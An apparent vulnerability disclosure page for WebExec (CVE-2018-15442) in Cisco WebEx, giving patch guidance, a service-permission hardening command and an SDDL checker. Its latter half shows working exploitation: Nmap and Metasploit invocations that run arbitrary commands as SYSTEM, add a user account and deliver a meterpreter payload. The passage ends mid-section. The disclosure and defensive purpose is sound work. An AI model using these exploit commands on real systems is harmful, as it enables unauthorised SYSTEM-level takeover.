Discovered by Ron Bowes and Jeff McJunkin of Counter Hack! You can view the technical writeup here, on Ron's blog!
If you have any questions or concerns, I made an email alias specifically for this issue: info@www.friendlybeacon.com!
WebExec is a vulnerability in, as the name implies, Cisco's WebEx client software. This is a pretty unique vulnerability, because it's a remote vulnerability in a client application that doesn't even listen on a port. The summary is: when the WebEx client is installed, it also installs a Windows service called WebExService that can execute arbitrary commands at SYSTEM-level privilege. Due to poor ACLs, any local or domain user can start the process over Windows' remote service interface (except on Windows 10, which requires an administrator login).
This will be somewhat of a "living" document initially, where we'll collect any patches, exploits, blogs, or further details as they emerge. Email me if you see anything that should be added!
Cisco Webex Meetings Desktop App fixes this issue in versions 33.5.6 and 33.6.0. You can update by launching the Cisco Webex Meetings application and clicking the Gear in the top right of the application window then choosing the Check for Updates entry from the drop-down list. This is also documented in the article, Update the Cisco Webex Meetings Desktop App.
Cisco Webex Productivity Tools fixes this vulnerability in version 33.0.5 and later. Cisco Webex Productivity Tools has been replaced with Cisco Webex Meetings Desktop App since Cisco Webex Meetings Release 33.2.0. You can update by launching the Cisco Webex Meetings application and clicking Settings in the top right of the application window then choosing the Check for Updates entry from the drop-down list. This is documented in more detail in the article, Check for Cisco Webex Productivity Tools Updates for Windows.
Administrators can update for their entire userbase using the article IT Administrator Guide for Mass Deployment of the Cisco Webex Meetings Desktop App.
The updated client will validate that the executable being run is signed by WebEx before executing it, which fixes this vulnerability, but may leave further issues open. As such, we'd strongly recommend running this command on every workstation with WebEx installed, if possible:
c:\> sc sdset webexservice D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPLORC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
Under the default configuration for WebExService, even when patched, any user with an account can start the service. That's fundamentally dangerous, even after patching. The command shown above removes that permission, so that the service can only be started by interactive local users (console or RDP sessions) or by administrative users.
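To check whether a workstation still has the dangerous start permission, the SDDL string that sc sdshow/sdset use can be parsed offline. The following is an added example, not code from the original page or from the Nmap/Metasploit work it describes: it flags every access-allowed ACE that grants SERVICE_START (RP) to a broad group such as Authenticated Users or Everyone; the "weak" SDDL it checks is a constructed sample, not WebExService's real default.

```python
import re

SERVICE_START = 0x0010  # SERVICE_START bit when rights are given as a hex mask
# Two-letter rights that allow starting the service outright (RP = SERVICE_START) or
# taking it over (GA = generic all, WD = write DAC, WO = write owner).
START_RIGHTS = {"RP", "GA", "WD", "WO"}
# Trustee aliases that every account on the box (or domain) falls into.
BROAD_TRUSTEES = {"WD": "Everyone", "AU": "Authenticated Users",
                  "BU": "Users", "DU": "Domain Users"}
ACE_RE = re.compile(r"\(([^)]*)\)")

# The hardened descriptor recommended on this page.
RECOMMENDED_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                    "(A;;CCLCSWRPWPLORC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
                    "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
# Constructed sample: same as above but also lets Authenticated Users start the service.
WEAK_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
             "(A;;CCLCSWRPLORC;;;AU)")


def can_start(rights):
    """True if a rights field (two-letter codes or a 0x mask) includes a start right."""
    if rights.startswith("0x"):
        return int(rights, 16) & SERVICE_START != 0
    codes = {rights[i:i + 2] for i in range(0, len(rights), 2)}
    return bool(codes & START_RIGHTS)


def dacl_aces(sddl):
    """Yield (ace_type, rights, trustee) for each ACE in the D: section."""
    start = sddl.find("D:")
    if start < 0:
        raise ValueError("no DACL in SDDL string")
    end = sddl.find("S:", start)          # SACL marker, if any, ends the DACL
    dacl = sddl[start + 2:end if end >= 0 else len(sddl)]
    for body in ACE_RE.findall(dacl):
        fields = body.split(";")
        if len(fields) != 6:
            raise ValueError(f"malformed ACE: ({body})")
        ace_type, _flags, rights, _obj, _inherit, sid = fields
        yield ace_type, rights, sid


def start_capable_trustees(sddl):
    """Sorted trustees that an access-allowed ACE lets start the service."""
    return sorted({sid for t, rights, sid in dacl_aces(sddl) if t == "A" and can_start(rights)})


def overly_permissive(sddl):
    """Start-capable trustees that are broad groups: these need the sc sdset fix."""
    return [sid for sid in start_capable_trustees(sddl) if sid in BROAD_TRUSTEES]
```

Feed it the output of `sc sdshow webexservice` collected from each host; an empty list from `overly_permissive` means only SYSTEM, administrators and interactive users can start the service.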
Nope, but at least we didn't give it a logo!
We have written checks and exploits in several frameworks!
We developed a pair of Nmap scripts, one to check for the vulnerability (smb-vuln-webexec.nse) and one to run actual code (smb-webexec-exploit.nse) (those links may not be ready yet). You can check out the full code from Nmap's SVN or on Nmap's git!
The following Nmap command will check whether or not a system is vulnerable by attempting to exploit the issue — note that this requires credentials of some kind (in a domain scenario, it can be any set of credentials):
nmap --script smb-vuln-webexec --script-args 'smbusername=testuser,smbpass=testuser,vulns.showall' -p139,445 -d <target>
Against a vulnerable system, it'll print:
PORT    STATE SERVICE      REASON
445/tcp open  microsoft-ds syn-ack
| smb-vuln-webexec:
|   VULNERABLE:
|   Remote Code Execution vulnerability in WebExService
|     State: VULNERABLE
|     IDs:  CVE:CVE-2018-15442
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in WebExService (WebExec).
|     Disclosure date: 2018-10-24
|     References:
|       http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15442
|       http://blog.skullsecurity.org/2018/technical-rundown-of-webexec
|_      http://www.friendlybeacon.com
On a system without WebEx, the output is:
Using smb-webexec-exploit.nse, we can attempt to actually run commands. It's difficult to determine if the commands actually run, however, so we suggest using both scripts if you want to be sure. Here's an example:
$ ./nmap -p445 --script=smb-webexec-exploit --script-args='smbuser=testuser,smbpass=testuser,webexec_command=net user nmap nmap /add' 192.168.56.101
Starting Nmap 7.70SVN ( http://nmap.org ) at 2018-10-18 11:49 PDT
Nmap scan report for 192.168.56.101
Host is up (0.00036s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
|_smb-webexec-exploit: Asked WebExService to run net user nmap nmap /add
That will add the user nmap to the remote system. You can run any command you want — be creative!
If you have access to the host's UI, you may also want a command to run with a GUI. The previous invocation may or may not run with a GUI — we're not 100% sure why or why not — but to guarantee a GUI, use the webexec_gui_command argument:
$ ./nmap -p445 --script=smb-webexec-exploit --script-args='smbuser=testuser,smbpass=testuser,webexec_gui_command=cmd.exe' 192.168.56.101
Starting Nmap 7.70SVN ( http://nmap.org ) at 2018-10-18 11:51 PDT
Nmap scan report for 192.168.56.101
Host is up (0.00036s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
|_smb-webexec-exploit: Asked WebExService to run cmd.exe (with a GUI)
We also developed a series of Metasploit modules! They're available in the git version of Metasploit!
This version of Metasploit contains three new modules to exploit WebExec: an auxiliary module for running an arbitrary command, an exploit module for running an arbitrary exploit, and a local module for privilege escalation. I'll have another technical post that talks about how those work, but using them is straightforward:
msf5 > use auxiliary/admin/smb/webexec_command
msf5 auxiliary(admin/smb/webexec_command) > set RHOSTS 192.168.1.100-110
RHOSTS => 192.168.56.100-110
msf5 auxiliary(admin/smb/webexec_command) > set SMBUser testuser
SMBUser => testuser
msf5 auxiliary(admin/smb/webexec_command) > set SMBPass testuser
SMBPass => testuser
msf5 auxiliary(admin/smb/webexec_command) > set COMMAND calc
COMMAND => calc
msf5 auxiliary(admin/smb/webexec_command) > exploit
[-] 192.168.56.105:445 - No service handle retrieved
[+] 192.168.56.105:445 - Command completed!
[-] 192.168.56.103:445 - No service handle retrieved
[+] 192.168.56.103:445 - Command completed!
[+] 192.168.56.104:445 - Command completed!
[+] 192.168.56.101:445 - Command completed!
[*] 192.168.56.100-110:445 - Scanned 11 of 11 hosts (100% complete)
[*] Auxiliary module execution completed
And to exploit it with an arbitrary payload:
msf5 > use exploit/windows/smb/webexec
msf5 exploit(windows/smb/webexec) > set SMBUser testuser
SMBUser => testuser
msf5 exploit(windows/smb/webexec) > set SMBPass testuser
SMBPass => testuser
msf5 exploit(windows/smb/webexec) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf5 exploit(windows/smb/webexec) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 exploit(windows/smb/webexec) > exploit
[*] 192.168.56.101:445 - Connecting to the server...
[*] 192.168.56.101:445 - Authenticating to 192.168.56.101:445 as user 'testuser'...
[*] 192.168.56.101:445 - Command Stager progress -   0.96% done (999/104435 bytes)
[*] 192.168.56.101:445 - Command Stager progress -   1.91% done (1998/104435 bytes)
...
[*] 192.168.56.101:445 - Command Stager progress -  98.52% done (102891/104435 bytes)
[*] 192.168.56.101:445 - Command Stager progress -  99.47% done (103880/104435 bytes)
[*] 192.168.56.101:445 - Command Stager progress - 100.00% done (104435/104435 bytes)
[*] Started bind TCP handler against 192.168.56.101:4444
[*] Sending stage (179779 bytes) to 192.168.56.101
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Finally, the local privilege escalation module, which is used after a session already exists as a non-SYSTEM user: